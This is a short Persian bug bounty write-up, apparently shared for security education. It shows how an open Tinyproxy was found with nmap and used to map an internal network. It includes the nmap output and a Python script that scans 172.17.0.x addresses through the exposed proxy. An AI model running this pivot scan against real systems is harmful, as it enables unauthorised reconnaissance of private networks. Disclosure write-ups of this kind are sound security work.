این رایتاپ بر اساس سناریوهای دریافت شده از متخصصین امنیتی باگدشت با هدف اشتراک گذاری دانش امنیتی و تسریع در ایمن سازی ارایه شده است.
شناسایی سرور به عنوان پروکسی و استفاده از منابع از آنها
فرآیند بررسی و پیدا شدن Open Proxy با nmap شروع میشود. در نهایت بعد از کانکت شدن به Proxy با استفاده از یک اسکریپت پایتون آیپی های داخلی شبکه را بر روی دامنه ها منطبق میکنیم.
root@rootbox:~# nmap -A -v example.com Starting Nmap 7.01 ( https://nmap.org ) at 2020-05-06 20:15 UTC Discovered open port 80/tcp on x.x.x.x Discovered open port 6666/tcp on x.x.x.x Discovered open port 6667/tcp on x.x.x.x 6666/tcp open irc? |_irc-info: Unable to open connection 6667/tcp open http-proxy Tinyproxy 1.8.4 |_http-server-header: tinyproxy/1.8.4 Service Info: Host: 172.17.x.x
اسکریپت پایتون مورد استفاده:
import requests import warnings warnings.filterwarnings('ignore', message='Unverified HTTPS request') proxies = { "http": "https://example.com:6667", "https": "https://example.com:6667", } for i in range(1,255): r = requests.get("https://172.17.0.{}".format(i), proxies=proxies , verify=False) if "1.8.4" not in r.text : print("https://172.17.0.{}".format(i))